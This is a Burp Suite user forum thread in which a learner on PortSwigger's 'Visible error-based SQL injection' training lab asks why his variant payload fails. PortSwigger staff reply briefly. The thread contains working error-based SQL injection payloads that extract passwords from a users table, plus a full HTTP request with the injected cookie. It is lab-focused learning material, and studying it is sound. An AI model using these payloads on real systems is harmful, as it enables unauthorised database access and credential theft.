Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Login to post

Lab: Visible error-based SQL injection

Akhil | Last updated: Aug 19, 2023 05:55PM UTC

Dear team, I am currently doing the Portswigger academy labs for SQL injection. In the lab - Visible error-based SQL injection, the below payload as per the solution works perfectly fine. PAYLOAD = ' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)-- The above payload works perfectly fine if the table is stored with data of administrator as the first row. In case if the table has multiple users, we should be utilising where clause right?. In that case the following payload (after url encoding) was tried by me and it throws an error. PAYLOAD = ' and 1=cast((select password from users where username='administrator') as Int)-- the error thrown is : ERROR: syntax error at end of input Position: 97 The request and response are as follows. GET / HTTP/2 Host: 0a38006d049dbbec81c92a4c004f0023.web-security-academy.net Cookie: TrackingId='+and+1%3dcast((select+password+from+users+where+username%3d'administrator')+as+Int)--; session=WFCJOE6UxLCftbXLTepwvDeaJ1Ojm7KH User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Te: trailers Response HTTP/2 500 Internal Server Error Content-Type: text/html; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Length: 2279 <!DOCTYPE html> <html> <head> <link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet> <link href=/resources/css/labs.css rel=stylesheet> <title>Visible error-based SQL injection</title> </head> <script src="/resources/labheader/js/labHeader.js"></script> <div id="academyLabHeader"> <section class='academyLabBanner'> <div class=container> <div class=logo></div> <div class=title-container> <h2>Visible error-based SQL injection</h2> <a class=link-back href='https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based'> Back&nbsp;to&nbsp;lab&nbsp;description&nbsp; <svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow> <g> <polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon> <polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon> </g> </svg> </a> </div> <div class='widgetcontainer-lab-status is-notsolved'> <span>LAB</span> <p>Not solved</p> <span class=lab-status-icon></span> </div> </div> </div> </section> </div> <div theme=""> <section class="maincontainer"> <div class="container"> <header class="navigation-header"> </header> <h4>ERROR: syntax error at end of input Position: 97</h4> <p class=is-warning>ERROR: syntax error at end of input Position: 97</p> </div> </section> </div> </body> </html> I would request the team to kindly explain me if there is any problem from my end. Regards Akhil Vijayan

Dominyque, PortSwigger Agent | Last updated: Aug 21, 2023 01:48PM UTC

Hi The commands used are database specific: https://portswigger.net/web-security/sql-injection/cheat-sheet

Akhil | Last updated: Aug 27, 2023 07:11AM UTC

Hi sir, The query mentioned by me is applicable to the type of database in the lab. Kindly check and revert back.

Dominyque, PortSwigger Agent | Last updated: Aug 29, 2023 12:59PM UTC

Hi Akhil At the moment, we are unable to provide technical support for queries that are not using the given solution; it is out of our scope.

You need to Log in to post a reply. Or register here, for free.